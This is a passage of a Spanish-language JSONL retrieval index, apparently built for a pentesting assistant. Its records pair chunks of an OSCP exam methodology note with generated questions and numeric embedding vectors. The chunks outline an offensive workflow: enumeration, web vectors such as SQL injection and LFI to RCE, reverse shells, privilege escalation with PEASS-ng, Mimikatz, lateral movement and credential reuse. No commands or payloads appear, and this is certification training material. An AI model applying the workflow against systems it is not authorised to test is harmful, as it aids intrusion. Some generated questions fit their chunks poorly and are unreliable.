0.00333, 0.05338, 0.02195, 3e-05, -0.09305, -0.01645, -0.10652, 0.01911, 0.01221, -0.04866, -0.0529, -0.08113, -0.0302, -0.06535, 0.04322, 0.06838, -0.03491, -0.00962, -0.02007, 0.00814, 0.01414, -0.00787, -0.09915]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "con que puedo estructurar mis ataques de manera repetible y ordenada", "v": [-0.00298, 0.07262, -0.18665, 0.00161, 0.06793, 0.05608, 0.06624, 0.04398, -0.05107, -0.08487, -0.10544, -0.02474, 0.1279, 0.0078, 0.11034, -0.00946, 0.0138, -0.01084, 0.0368, -0.05883, -0.01194, -0.10317, 0.08547, 0.11616, -0.03473, -0.07345, 0.03061, 0.07574, -0.06227, -0.07929, -0.05433, 0.1676, 0.05984, -0.04812, -0.04804, 0.10113, -0.12053, 0.07544, -0.03091, -0.02413, -0.09622, 0.02548, -0.22806, -0.00453, 0.08754, 0.08692, 0.01152, 0.08814, -0.02833, -0.02294, 0.01559, 0.03293, -0.19556, -0.05913, -0.00359, -0.10664, 0.06693, -0.11544, 0.10848, 0.05361, 0.0275, 0.04671, 0.0664, -0.06471, 0.07842, -0.01807, -0.05654, -0.01978, -0.05112, -0.0468, -0.03045, 0.06702, -0.11414, -0.01289, 0.06422, 0.06469, 0.05753, 0.01946, 0.02706, 0.06791, -0.03098, -0.06553, -0.13646, 0.0718, -0.13188, -0.00186, 0.01248, -0.05046, -0.03825, -0.05352, -0.00751, -0.03377, -0.04003, -0.00047, -0.06723, -0.03011, -0.05717, 0.004, 0.03909, 0.03106, 0.02242, -0.02668, -0.0592, 0.06517, -0.00809, 0.08403, -0.01484, 0.00048, 0.10927, -0.13674, -0.0297, -0.08459, -0.04736, -0.04785, -0.03513, -0.10714, -0.08975, 0.03381, 0.03582, -0.01266, -0.01386, 0.02971, -0.02445, 0.11159, -0.07231, -0.00662, 0.03401, 0.03182, 0.02321, -0.045, -0.0292, 0.06019, 0.0305, -0.02757, -0.0643, -0.02421, -0.06686, -0.08669, 0.00123, -0.02994, 0.06268, 0.17643, 0.01899, -0.01195, -0.03141, 0.01653, 0.05886, -0.09021, -0.10154, 0.01476, -0.07106, 0.1293, 0.05975, 0.05612, -0.06416, 0.03342, 0.02075, -0.08844, -0.00815, 0.10244, -0.03901, 0.11808, -0.07384, 0.05931, -0.00623, -0.01218, -0.0747, -0.01381, 0.04592, 0.02271, -0.0426, 0.02193, -0.00637, -0.05583, -0.00141, -0.04958, -0.05555, -0.05473, -0.00813, -0.03876, -0.02667, -0.04737, -0.0671, -0.05196, -0.00926, -0.04291, -0.00215, 0.04743, 0.00098, 0.0522, 0.07558, 0.04947, -0.00952, 0.01139, -0.02095, -0.09032, -0.05382, 0.01698, 0.00199, 0.02928, -0.00549, -0.08337, -0.05069, 0.01812, 0.06246, 0.04803, -0.01612, 0.00866, -0.00433, 0.11182, 0.07867, -0.01967, 0.04926, -0.04797, -0.05011, -0.02451, 0.07182, -0.04453, -0.05469, -0.00043, 0.01784, 0.06432, 0.10945, -0.02142, -0.0188, -0.04603, -0.06183, -0.02794, 0.06985, 0.04815, -0.033, 0.00123, 0.01224, -0.04423, 0.0486, 0.01098, 0.01942, -0.03462, -0.05906, -0.00631, 0.0147, 0.04582, -0.0492, -0.05623, 0.01102, -0.0829, -0.09439, 0.0489, 0.00456, -0.01231, -0.02869, 0.04697, 0.02323, -0.06549, -9e-05, -0.05002]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "cual es la mejor forma de organizar las tΓ©cnicas sin perder el hilo", "v": [-0.06789, 0.11966, -0.11957, -0.00231, 0.01782, -0.07326, -0.03397, 0.02692, -0.07438, -0.03194, -0.12877, -0.06685, 0.0037, -0.08606, 0.13782, 0.00489, 0.10428, -0.1398, 0.05996, 0.02375, -0.1148, 0.06773, 2e-05, -0.01009, -0.02054, -0.111, 0.1082, -0.02254, -0.23723, -0.02654, -0.04889, 0.02034, 0.07965, -0.07393, 0.01272, 0.01435, 0.05005, 0.04611, -0.1157, 0.06138, -0.24044, 0.03176, -0.05011, 0.08265, 0.03023, -0.12503, -0.04828, 0.08322, 0.02043, 0.02961, 0.0375, 0.09062, 0.04357, -0.06559, 0.00306, -0.18457, -0.0457, -0.08072, 0.07793, -0.09325, -0.02028, 0.00822, 0.01589, 0.09553, 0.11939, 0.02849, -0.03652, -0.02379, -0.05471, -0.00263, -0.00869, -0.03612, -0.01428, 0.00043, 0.02583, 0.12374, -0.00756, 0.11129, 0.03593, -0.02054, 0.03525, -0.01586, -0.08527, 0.03664, -0.1164, -0.09011, 0.08177, 0.01223, -0.06102, -0.11409, 0.01341, -0.03801, 0.04491, -0.04669, -0.03942, -0.06502, 0.07671, 0.07432, 0.07679, 0.09697, 0.01573, -0.0729, -0.09092, 0.07057, -0.03848, 0.04812, 0.03616, 0.05637, 0.03076, -0.05379, -0.1284, 0.04367, -0.04341, 0.03933, -0.03048, -0.12296, 0.02209, -0.08586, -0.03523, 0.03344, 0.00785, -0.01649, 0.02002, 0.0186, 0.04699, -0.0245, 0.04093, 0.07275, 0.01785, 0.05381, 0.00542, 0.01249, -0.08128, -0.01601, 0.00115, -0.04255, 0.0257, -0.00806, 0.0008, -0.08111, -0.05537, 0.06003, -0.12804, -0.10606, 0.01648, -0.04972, 0.09518, -0.06032, -0.13146, 0.00233, -0.00853, -0.01068, 0.0541, 0.02904, -0.04081, -0.0002, -0.07685, -0.11522, 0.05605, 0.04812, -0.0803, 0.06256, 0.00727, -0.00798, 0.01802, -0.05762, -0.00585, 0.03922, -0.01423, -0.02569, 0.01013, 0.0091, -0.06409, 0.00619, -0.05839, -0.04198, -0.02493, -0.07607, 0.06458, 0.00327, 0.02873, 0.04517, -0.03916, 0.0002, 0.01171, -0.04667, -0.0145, 0.02516, 0.02785, -0.02847, 0.01698, -0.04632, -0.07148, -0.00971, -0.05801, -0.09535, -0.06176, -0.05118, 0.0729, 0.02981, -0.05522, -0.05763, -0.00846, -0.01244, 0.01897, 0.03633, -0.06715, -0.01415, -0.00655, 0.00305, 0.02935, -0.09213, 0.01852, -0.07306, -0.03302, 0.02267, -0.03572, -0.07099, -0.02392, 0.01595, 0.02786, -0.01024, 0.01544, -0.07651, -0.03454, -0.06254, 0.02661, 0.07268, 0.02416, 0.04912, -0.03758, 0.02643, 0.03909, 0.05602, 0.03682, 0.03033, 0.06537, -0.08725, 0.00188, -0.08163, 0.02925, 0.07711, -0.00638, -0.03582, -0.03168, -0.01512, -0.10426, 0.03541, -0.00144, -0.05202, 0.06409, 0.01503, 0.09584, -0.01649, 0.01238, -0.03965]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## El bucle\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a la siguiente mΓ‘quina\n```", "indexar": "que herramienta me permite hacer una enumeraciΓ³n exhaustiva de usuarios?", "v": [-0.11534, 0.09306, -0.22051, -0.2231, 0.05869, -0.04756, -0.18226, 0.0088, -0.06493, -0.1127, -0.11384, -0.04416, 0.0787, -0.06147, 0.05476, -0.01112, 0.06097, -0.06122, 0.05389, 0.06036, -0.00123, 0.03777, -0.1267, 0.03152, -0.14585, 0.01815, 0.00252, -0.03825, -0.14137, 0.08297, -0.03661, 0.00764, -0.02587, -0.0934, -0.08785, -0.03263, -0.01734, -0.00347, 0.03745, 0.11274, 0.04926, 0.04472, -0.11741, 0.01851, 0.05557, 0.06868, -0.10391, 0.00765, 0.01107, 0.10556, -0.08236, -0.10475, -0.12545, -0.01163, -0.05398, -0.1582, 0.18409, -0.1782, 0.01486, -0.14096, -0.07069, -0.01087, -0.00863, 0.05339, -0.04434, 0.09038, 0.02304, -0.07601, -0.02468, 0.1943, 0.04432, 0.02234, 0.06075, -0.03469, 0.02147, -0.05207, -0.00515, 0.00764, 0.0021, -0.00034, 0.01929, -0.08678, -0.0324, -0.07872, -0.05066, -0.03649, 0.10702, 0.02123, 0.03815, -0.03093, -0.01226, 0.04946, 0.01813, -0.01262, 0.01731, -0.01276, 0.09179, -0.03718, -0.0327, -0.02587, 0.13561, -0.00398, -0.04911, 0.0467, 0.00244, -0.04643, -0.03863, -0.00823, -0.11636, -0.04782, 0.09203, -0.00401, 0.05264, -0.0247, -0.01851, 0.06087, -0.04429, -0.06479, -0.03421, -0.04662, 0.06929, 0.02775, -0.05828, -0.08701, 0.05507, -0.02878, -0.05462, 0.06412, -0.03779, -0.11981, 0.02496, -0.05402, -0.05146, 0.00214, -0.06066, -0.05066, 0.04064, -0.09316, 0.02207, -0.02865, -0.04888, -0.01847, -0.08975, -0.07278, 0.03729, -0.06523, -0.02798, -0.03906, -0.034, -0.03478, -0.01762, -0.04342, -0.04906, -0.03427, -0.00501, 0.02689, 0.00019, 0.07179, -0.10828, -0.02648, -0.03652, -0.08192, 0.08892, -0.03003, 0.00568, -0.04897, 0.08434, 0.02542, 0.00306, 0.03551, 0.04465, 0.02888, 0.06365, 0.00576, 0.02427, 0.00595, -0.0185, 0.01025, -0.02953, -0.02496, -0.03658, -0.07425, -0.00705, -0.05775, 0.01319, -0.06573, 0.0246, -0.01906, -0.00579, 0.03903, -0.06579, 0.07965, 0.03761, -0.06712, 0.07671, 0.01706, 0.01768, -0.03019, 0.02456, -0.04177, 0.01355, -0.01788, 0.00798, -0.02118, -0.00396, 0.02283, 0.0039, -0.04065, 0.02851, -0.03728, 0.02939, 0.02502, 0.01877, -0.00881, 0.01106, -0.01679, 0.00256, -3e-05, -0.03459, -0.09679, -0.0245, -0.05846, 0.02651, 0.04462, -0.02189, 0.06014, -0.02417, -0.00018, -0.03987, -0.04034, 0.06524, -0.11347, 0.00958, -0.01394, 0.02713, -0.10726, -0.01524, -0.00915, -0.04579, 0.00169, -0.02958, 0.04606, 0.06078, 0.03954, -0.05711, -0.01152, 0.04024, -0.03934, -0.06819, -0.04813, -0.04214, -0.03102, 0.06867, -0.00291, 0.00065, 0.0114]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## El bucle\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a la siguiente mΓ‘quina\n```", "indexar": "con que programa puedo escalar privilegios automΓ‘ticamente revisando mis scripts manualmente?", "v": [0.39437, 0.22015, -0.12714, -0.0677, 0.09124, -0.0932, -0.0193, -0.12784, -0.07389, -0.08301, 0.06213, -0.02632, -0.00671, -0.06088, 0.05988, 0.02674, 0.01029, -0.03518, 0.00798, 0.07166, 0.06303, -0.07975, -0.02172, -0.06921, 0.01714, -0.07891, 0.00825, -0.00211, -0.14337, -0.01557, 0.03483, 0.15219, 0.0058, -0.09631, 0.04017, -0.01956, 0.01428, 0.03178, -0.00777, 0.02954, -0.04219, 0.10048, -0.06024, 0.02351, 0.04044, -0.06301, 0.06048, 0.05254, -0.00911, -0.05458, 0.07798, -0.02494, 0.03759, -0.0688, 0.03692, 0.02135, 0.18094, -0.04229, -0.00603, 0.03504, 0.03463, 0.02054, 0.026, -0.0131, 0.02611, -0.00159, 0.05352, -0.13007, -0.0868, 0.10694, -0.06397, 0.03588, 0.0248, 0.03648, -0.00971, 0.00836, -0.0434, -0.08438, 0.09999, -0.00838, -0.08169, -0.09853, 0.01395, 0.11315, -0.06443, -0.10798, -0.03667, -0.02387, -0.00131, -0.02057, 0.0493, -0.0959, 0.00814, -0.00943, 0.06956, -0.04117, 0.10245, 0.05317, 0.06193, 0.11626, -0.02474, -0.0948, 0.01607, 0.15493, 0.04213, 0.07089, 0.05475, -0.00487, -0.04301, 0.0028, 0.00958, 0.05755, -0.02861, 0.01244, -0.10185, -0.01502, -0.04893, -0.02267, 0.00965, -0.10002, -0.09264, -0.06355, -0.03623, -0.00803, 0.04062, -0.09042, -0.04292, 0.12483, 0.0074, 0.02748, -0.07973, 0.02706, 0.0089, -0.03964, -0.03104, 0.03097, 0.00321, 0.01455, 0.01595, -0.0761, 0.06516, 0.06459, 0.06659, 0.0404, 0.1053, -0.04686, -0.08361, -0.09878, -0.00246, -0.03747, -0.00718, 0.03692, 0.04596, 0.12754, 0.02661, -0.09261, 0.03458, -0.01227, -0.04264, 0.08666, 0.01706, 0.01202, -0.05205, 0.03389, 0.05923, -0.04013, -0.03067, -0.03968, 0.00332, -0.01047, -0.03702, 0.00906, 0.04175, -0.01722, -0.01071, -0.04444, 0.03017, -0.02822, 0.0395, 0.02178, -0.05712, 0.02932, 0.06007, -0.01698, -0.05708, -0.06781, -0.00023, 0.0256, 0.06382, 0.02698, 0.00016, 0.03988, -0.0646, -0.02293, -0.02397, -0.03195, -0.05247, 0.01894, -0.05761, -0.02828, -0.01844, 0.05517, 0.03033, -0.03745, 0.03617, 0.02697, 0.01626, 0.03115, 0.00679, 0.08079, 0.03921, -0.02676, 0.10145, -0.0187, -0.00501, 0.00346, 0.03491, -0.01151, -0.01001, -0.03032, 0.01895, -0.0014, 0.14478, -0.0054, 0.00176, -0.03676, 0.044, 0.07223, 0.02105, 0.07239, -0.06154, 0.00681, -0.02362, -0.04235, 0.07767, 0.01688, 0.04322, -0.01002, -0.03394, -0.04048, 0.01422, 0.04384, 0.00621, -0.07055, -0.03973, -0.05433, -0.05401, 0.0354, 0.04963, 0.01111, -0.01003, 0.01939, 0.00481, -0.03655, 0.03925, -0.03413]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## El bucle\n```\nEnumeraciΓ³n exhaustiva β†’ vector β†’ foothold β†’\nPrivEsc con script automatizado + revisiΓ³n manual β†’\ndocumentar antes de pasar a la siguiente mΓ‘quina\n```", "indexar": "cual es un software para documentar las vulnerabilidades antes de moverme a otra mΓ‘quina?", "v": [0.01714, -0.01454, -0.05921, -0.18691, -0.17366, 0.00725, -0.09568, 0.04952, -0.11163, -0.14887, -0.08217, -0.11248, 0.04629, -0.06529, -0.05016, -0.0384, 0.1698, -0.1435, 0.0151, 0.02302, 0.01607, -0.05741, 0.02498, -0.06758, -0.01654, 0.02505, -0.01404, 0.00411, -0.16814, -0.08992, 0.01205, 0.03414, 0.11464, -0.04522, -0.01914, -0.00412, 0.00562, -0.05557, 0.06366, 0.03886, 0.00707, -0.01802, -0.09523, 0.1468, 0.0838, -0.05495, -0.02856, -0.05135, 0.04901, -0.02429, 0.0047, 0.03276, -0.03959, 0.00943, 0.02854, -0.18923, 0.10405, -0.07265, 0.02561, -0.00936, -0.0679, 0.1166, -0.10198, 0.01675, 0.02774, -0.06441, 0.05184, -0.07871, -0.12571, 0.02226, -0.03478, 0.01184, 0.01825, 0.02987, -0.03, -0.03867, -0.0176, -0.04589, -0.01576, 0.0629, 0.03155, 0.06859, 0.00427, 0.06763, -0.14797, -0.07124, 0.12643, -0.02575, 0.12218, -0.08585, 0.07815, 0.11464, -0.07044, 0.07345, 0.19768, 0.0106, 0.13626, 0.04797, -0.0613, 0.05208, -0.02345, -0.03112, 0.01198, 0.08996, -0.00973, 0.11487, 0.02829, -0.03935, -0.10682, -0.04885, 0.02293, 0.08368, -0.06578, -0.02953, -0.01625, 0.01399, -0.03428, -0.04857, 0.00738, -0.0708, 0.07999, -0.01747, -0.01892, -0.14051, 0.05145, -0.01226, 0.02363, 0.08179, -0.03428, 0.00629, 0.09503, -0.0114, -0.0094, -0.0202, -0.00056, -0.01716, 0.11524, -0.09262, -7e-05, -0.08275, 0.09162, 0.02455, -0.01279, 0.05471, 0.07766, 0.04315, -0.00133, -0.02993, -0.06777, 0.04607, -0.00241, -0.04453, 0.02736, 0.0089, -0.02384, 0.07096, 0.01836, -0.02623, -0.13293, 0.01869, 0.0052, 0.03566, -0.09368, -0.07581, 0.0091, -0.01467, -0.00638, 0.06702, 0.0521, -0.00726, 0.03593, 0.01565, 0.06557, 0.03935, 0.0318, -0.0613, -0.02106, -0.05577, -0.00847, -0.07409, 0.01988, 0.03744, 0.12141, 0.01074, 0.00314, -0.00403, -0.02832, 0.00428, 0.02984, 0.04117, 0.03438, 0.00283, -0.01804, -0.05209, 0.07261, -0.04257, -0.04353, 0.00034, 0.08443, -0.01018, -0.10241, -0.06318, -0.06117, 0.02945, 0.03979, 0.09824, -0.02053, -0.04792, -0.00763, 0.03238, -0.01353, 0.02627, 0.05539, -0.02315, -0.08707, -0.03966, 0.01928, 0.06763, -0.06442, -0.03071, 0.01963, -0.0565, 0.00441, 0.00961, -0.02315, -0.00728, 0.06938, 0.00784, -0.01481, -0.03617, -0.03194, 0.00718, -0.02056, -0.02323, 0.03241, 0.03851, 0.03971, -0.05534, -0.02693, -0.05776, -0.00625, 0.05405, -0.00437, -0.1039, -0.02864, -0.00401, -0.0141, 0.02472, -0.01672, -0.05763, 0.01367, 0.00748, 0.02119, -0.08111, 0.0097, 0.00552]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pasos\n1. **Enumera a fondo** β†’ EnumeraciΓ³n (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** β†’ web (EnumeraciΓ³n web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** β†’ Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** β†’ script automatizado (PEASS-ng) **+** revisiΓ³n manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** β†’ Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** β†’ Reporte OSCP.", "indexar": "que herramienta me ayuda a encontrar puertos olvidados en la red?", "v": [0.22119, 0.09704, -0.10244, -0.17614, -0.01388, 0.0332, 0.02227, -0.06555, -0.09381, -0.08099, -0.13312, -0.02322, 0.08439, -0.04749, 0.07287, -0.05297, -0.01091, 0.0601, 0.073, -0.03, -0.03843, 0.02526, -0.11987, 0.0179, -0.00629, 0.03208, 0.07487, -0.0024, -0.12703, 0.06955, -0.04131, -0.02737, -0.00485, -0.01861, -0.10485, -0.04419, 0.09541, 0.00178, 0.02153, 0.06802, 0.04906, 0.07329, 0.00355, -0.01798, 0.08984, -0.09223, -0.0551, 0.01526, 0.04965, 0.06326, -0.06529, -0.21089, -0.17045, -0.11406, 0.01099, -0.15102, 0.1929, -0.03257, -0.07182, -0.12602, -0.08479, 0.04416, -0.0327, -0.01166, 0.03429, -0.0257, -0.00365, 0.00891, -0.07068, 0.0965, -0.04704, 0.03444, -0.00876, -0.00797, -0.03098, -0.06367, 0.07942, 0.02567, 0.06256, -0.01789, 0.0626, 0.01024, -0.01982, -0.05415, 0.0403, -0.10319, -0.01284, 0.0273, 0.00062, -0.14427, 0.06141, -0.0475, -0.01004, 0.03515, -0.0475, 0.05176, 0.01301, -0.01911, 0.01351, 0.01972, 0.10345, 0.02444, -0.04544, -0.04286, 0.03123, -0.00679, -0.02336, -0.02227, -0.04639, 0.064, 0.16192, 0.00335, 0.1543, -0.04177, 0.00172, 0.08529, 0.05894, -0.08093, -0.00607, -0.07222, 0.0916, -0.03624, -0.07708, -0.04684, -0.04283, 0.01042, -0.00778, 0.07742, 0.08021, -0.06521, 0.00512, -0.03564, -0.06307, -0.11148, -0.02762, 0.02557, -0.00916, -0.10875, -0.05687, 0.0164, -0.03606, 0.04557, -0.10072, -0.1301, -0.00382, 0.06766, 0.1042, -0.00496, -0.01835, -0.02479, -0.00845, 0.00427, 0.03256, -0.00384, -0.03214, 0.05379, 0.11486, 0.02229, -0.0926, 0.00859, -0.06938, -0.03286, -0.01308, -0.02571, 0.03705, -0.04645, 0.03325, 0.07763, 0.0568, 0.0021, 0.01001, 0.02462, -0.04095, -0.05146, -0.08938, -0.08159, -0.03723, -0.07926, -0.05432, -0.0503, -0.03109, 0.00779, -0.07181, -0.00614, 0.01083, -0.1633, 0.03542, -0.13184, 0.00816, 0.03944, 0.02713, -0.06084, 0.02527, -0.02368, 0.00088, 0.0616, 0.01566, -0.01176, 0.03422, -0.04817, -0.01516, 0.01483, 0.02651, -0.03339, 0.00469, 0.06164, -0.0835, 0.05643, -0.02919, 0.04214, -0.007, 0.02183, 0.00205, -0.02478, -0.03744, -0.00395, -0.02697, 0.05269, -0.01116, -0.01512, 0.00595, -0.00522, 0.01203, 0.06525, -0.02744, 0.04501, 0.06026, 0.0549, -0.04405, 0.01324, 0.03935, -0.08763, -0.0222, -0.04045, 0.00305, -0.01506, 0.01686, -0.00434, -0.03042, 0.0352, 0.02748, -0.01574, 0.01492, -0.00219, 0.01578, -0.07486, 0.00144, -0.01277, -0.01672, -0.02407, -0.00749, 0.05093, 0.07731, -0.07205, 0.05304, -0.08177]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pasos\n1. **Enumera a fondo** β†’ EnumeraciΓ³n (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** β†’ web (EnumeraciΓ³n web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** β†’ Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** β†’ script automatizado (PEASS-ng) **+** revisiΓ³n manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** β†’ Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** β†’ Reporte OSCP.", "indexar": "cual es un script automatizado para realizar privesc y escalar privilegios?", "v": [0.28738, 0.04575, -0.21261, -0.03253, 0.11099, -0.0993, 0.05773, -0.12853, -0.09529, -0.06807, 0.08661, -0.0854, -0.04239, 0.02509, 0.13768, -0.05272, -0.00171, -6e-05, 0.01302, 0.2131, 0.0533, -0.02036, -0.04045, -0.09068, -0.03571, -0.09123, -0.00596, 0.04223, -0.15334, 0.00467, 0.04897, 0.19753, -0.01385, -0.08703, 0.21357, -0.04079, 0.07864, 0.09041, -0.01713, -0.03791, -0.0934, 0.08969, -0.06102, -0.03945, 0.02394, -0.03733, -0.01109, 0.08598, 0.01116, -0.07892, 0.06701, -0.01471, 0.01616, -0.14316, 0.00992, 0.13493, 0.12281, -0.00294, 0.06599, -0.03534, -0.03488, -0.02881, 0.01838, -0.00278, -0.02316, -0.03871, 0.00669, -0.03585, -0.07298, 0.03126, 0.00339, -0.00908, 0.03373, 0.01899, 0.08517, 0.01234, -0.03682, -0.08759, 0.04514, 0.02063, -0.01621, -0.05459, -0.06299, 0.08909, -0.01561, -0.09633, -0.00481, 0.05006, 0.01323, 0.04251, 0.07866, -0.08676, -0.01691, -0.09086, 0.02813, -0.02509, 0.03807, 0.01492, 0.00823, 0.06887, 0.00072, -0.05607, -0.03625, 0.16828, 0.07243, 0.05702, 0.00387, -0.0396, -0.047, -0.01871, 0.02539, 0.05731, -0.01566, 0.03538, -0.11258, -0.00548, -0.10739, -0.04263, -0.01526, -0.13561, -0.04653, -0.03643, -0.0021, -0.06254, 0.02654, -0.10502, -0.00897, 0.08766, -0.014, 0.00904, -0.07401, 0.01713, 0.02764, -0.05483, -0.03734, 0.07213, 0.07024, -0.03599, 0.00427, -0.06255, 0.09333, 0.03048, -0.02226, -0.01533, 0.08375, -3e-05, -0.03318, -0.0834, -0.04453, -0.04614, -0.0897, 0.03895, -1e-05, 0.10697, 0.04298, -0.11477, 0.00749, -0.05343, -0.01274, 0.08168, -0.01262, 0.01582, -0.07146, 0.02019, 0.03668, -0.01576, 0.00113, -0.04197, -0.04511, -0.07136, 0.04216, -0.03564, -0.00946, -0.00227, -0.001, -0.05604, 0.01137, -0.01626, 0.03155, 0.03263, -0.02288, -0.00039, 0.07079, -0.00703, -0.04007, -0.01173, 0.02775, -0.04635, 0.02946, 0.07421, -0.01469, 0.02464, -0.03948, -0.03283, 0.00591, -0.04667, 0.00147, 0.00089, -0.01171, -0.01207, 0.01149, -0.00283, -0.01511, -0.05317, -0.03388, -0.02786, 0.06365, -0.01342, -0.01828, 0.0578, 0.05756, 0.00328, 0.04415, -0.01306, 0.01187, 0.02536, 0.02428, 0.01318, -0.06962, -0.06636, -0.00396, 0.01931, 0.09519, -0.00273, 0.01567, 0.03537, 0.01467, 0.09625, -0.0233, 0.01892, -0.07124, -0.00835, -0.00779, -0.00707, 0.04072, 0.0817, 0.0481, -0.00969, -0.0156, -0.08079, 0.00451, 0.06179, 0.00751, -0.03915, -0.06336, -0.03187, -0.05183, 0.04644, -0.01123, -0.05229, -0.00139, -0.02563, -0.02323, 0.02212, 0.07765, -0.05132]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas de oro\n- **Reutiliza credenciales** siempre: una pass de un user suele valer en otros hosts y servicios.\n- **1.5h sin progreso = cambia de mΓ‘quina** (ver GestiΓ³n del tiempo).\n- Captura todo mientras lo haces, no al final.\n\nRelacionado: Estructura del examen Β· Reglas de herramientas Β· OSCP MOC", "indexar": "quΓ© programa me permite reutilizar credenciales en diferentes servicios", "v": [-0.22163, 0.07575, -0.16889, -0.01601, 0.16732, -0.06878, 0.03947, -0.10075, -0.10865, -0.18888, -0.11623, -0.02516, -0.03729, -0.11849, 0.02543, 0.11585, 0.06148, -0.06777, 0.16583, 0.02032, 0.00315, -0.10817, -0.09236, -0.07278, -0.1359, -0.00313, 0.08301, -0.11233, 0.04867, 0.06544, -0.02757, 0.0111, -0.01592, -0.14065, -0.08581, 0.02173, 0.02249, 0.0677, 0.00668, 0.00721, 0.03713, -0.01587, -0.04191, 0.02673, 0.16716, 0.02764, 0.00312, -0.03694, -0.01931, -0.01392, -0.00851, -0.06545, -0.09226, -0.00709, 0.09141, -0.05411, -0.07363, -0.06821, -0.0611, -0.04553, -0.02546, 0.01578, 0.0167, 0.04187, 0.12277, -0.06121, 0.02855, -0.01723, -0.0805, 0.10159, -0.04405, -0.04284, 0.1107, -0.04708, -0.10349, -0.02467, -0.03901, -0.06119, 0.00422, 0.01084, 0.03392, 0.01059, 0.03579, 0.09448, 0.0309, 0.02879, 0.01781, -0.03114, -0.03059, 0.00499, 0.04244, 0.07052, -0.01586, 0.11141, -0.05813, 0.04966, 0.08007, 0.05515, -0.01137, 0.0588, 0.04643, -0.07794, -0.0623, 0.08832, -0.03951, 0.08017, 0.03686, -0.04122, -0.08334, 0.02119, 0.02851, 0.00107, -0.02739, -0.05793, -0.07168, 0.03638, 0.01351, -0.04498, 0.05212, -0.06311, -0.02695, 0.00167, 0.08142, 0.03312, 0.12269, 0.01169, -0.07261, 0.09479, -0.07432, -0.00304, 0.01156, 0.0093, -0.07252, -0.04313, 0.02331, -0.13846, 0.0151, -0.04077, -0.02056, 0.01225, 0.00546, 0.02044, 0.00342, 0.0592, -0.04543, -0.05554, 0.04785, -0.09789, 0.05172, -0.00561, 0.02438, 0.1087, 0.01678, 0.00363, -0.03705, -0.02815, 0.03453, -0.0425, -0.09953, 0.05908, -0.08786, -0.08558, 0.07631, -0.03127, 0.06148, -0.03053, 0.02049, -0.01811, 0.05757, 0.12251, -0.02908, 0.07541, 0.01146, -0.0335, 0.00305, 0.04543, -0.05644, -0.06315, 0.00687, -0.09814, -0.07963, 0.07388, 0.05349, -0.00132, -0.0032, -0.02488, -0.12302, 0.08052, 0.00978, -0.04704, 0.00373, 0.01103, -0.03962, -0.00178, -0.00167, -0.03473, -0.00932, -0.07997, -0.01165, -0.01859, -0.08232, -0.01133, -0.00646, -0.02974, 0.00144, 0.08441, 0.04988, 0.03579, 0.03807, 0.10406, 0.00014, -0.05966, 0.10278, 0.01527, -0.06165, 0.00296, -0.00035, 0.01017, 0.06633, -0.02563, -0.00142, -0.08233, 0.00689, 0.01981, -0.02167, -0.06676, 0.08091, 0.00644, 0.00741, 0.03114, -0.01222, -0.06499, -0.05481, -0.05918, 0.01448, -0.06085, -0.01236, -0.02454, 0.03119, -0.12675, 0.003, 0.07425, -0.03765, -0.00858, -0.0048, 0.04243, -0.02571, 0.04299, -0.00359, 0.02661, -0.0495, 0.05505, -0.00447, -0.06521, 0.02546, 0.00181]} -{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, 